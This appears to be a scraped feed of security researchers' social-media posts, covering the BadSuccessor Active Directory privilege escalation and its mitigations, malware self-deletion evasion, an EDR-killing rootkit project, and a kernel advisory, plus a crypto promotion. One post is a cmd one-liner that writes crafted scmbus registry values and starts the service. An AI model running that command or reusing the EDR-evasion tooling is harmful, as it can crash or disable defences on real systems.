🔥The 9th Round of Easy Loan, Earn $40 Reward is in progress❗️ ⏰ Promotion Period: January 15th - Feburary 15th, 2025 👉 Register now and check more details at gate.io/campaigns/358

🚀 We just released my research on BadSuccessor - a new unpatched Active Directory privilege escalation vulnerability It allows compromising any user in AD, it works with the default config, and.. Microsoft currently won't fix it 🤷‍♂️ Read Here - akamai.com/blog/security-…

“does not currently meet the threshold for immediate servicing” classic MSRC response 🥴

Will be working on more content that involves Windows Performance Analyzer (WPA) - I think this is such an underrated tool, so will try to spread more love for it 😅

Good morning!

Who also drinks coffee just dark without milk or sugar?

This is how I feel about these so called “Principal” titles within InfoSec, unfortunately.

Great post with 3 mitigations: 1️⃣ Add-BadSuccessorOUDenyACEs.ps1 github.com/JimSycurity/dM… This script will set 3 deny ACEs on OUs to prevent DMSA abuse. 2️⃣ Disable Implicit Owner Rights support.microsoft.com/en-us/topic/kb… 3️⃣ Don’t have a KDS Root Key learn.microsoft.com/en-us/powershe… Check for KDS

Active Directory is such a pain in the ass to work with! Wish we could go back to Novell Directory Services 🤣

BSides Pyongyang when??? The North Korean Computer Emergency Response Team

I will be speaking at this event! 🫣

It’s my birthday! 😊

Windows 11 24H2 broke a popular malware evasion technique! The Lloyd Labs self-deletion method now fails because of NTFS changes, so I spent time with kernel debugging to figure out why and how to fix it. Full technical breakdown: tkyn.dev/2025-6-8-The-N…

🚨 I'm looking for a Job🚨 A user-mode code and its rootkit that will Kill EDR Processes permanently by leveraging the power of Process Creation Blocking Kernel Callback Routine registering and ZwTerminateProcess. Project : github.com/SaadAhla/dark-… =========== Looking for roles

Everyone wants to get rid of AD, but it seems to be challenging for a lot of orgs

Google Cloud and Cloudflare hit by widespread service outages - Sergiu Gatlan bleepingcomputer.com/news/technolog… bleepingcomputer.com/news/technolog…

Happy Friday! Our intern, neverm0r , discovered and reported a NPD due to race-condition in afd.sys. Wasn’t assigned a cve doesn’t mean it’s less interesting, right!? pixiepointsecurity.com/blog/advisory-…

cmd /v/k"set A=A&(for /L %i in (1,1,9)do set A=!A!!A!)&set R=reg add HKLM\SYSTEM\CurrentControlSet\Services\scmbus /f /t 3 /v &!R!ForceReadCachedLabels /d C!A!B!A!1&(for %v in (EnableLabelCache CreateSimulatedRamdiskRootDevice RamdiskSizeInBytes)do !R!%v /d DAC5)&sc start scmbus"

When PMs hear someone making a request directly to their devs instead of going through them

Yikes! 😬

Go read this if you’re into EDR evasion. Its *really* cool research. Plus lots of details in the blog post 👌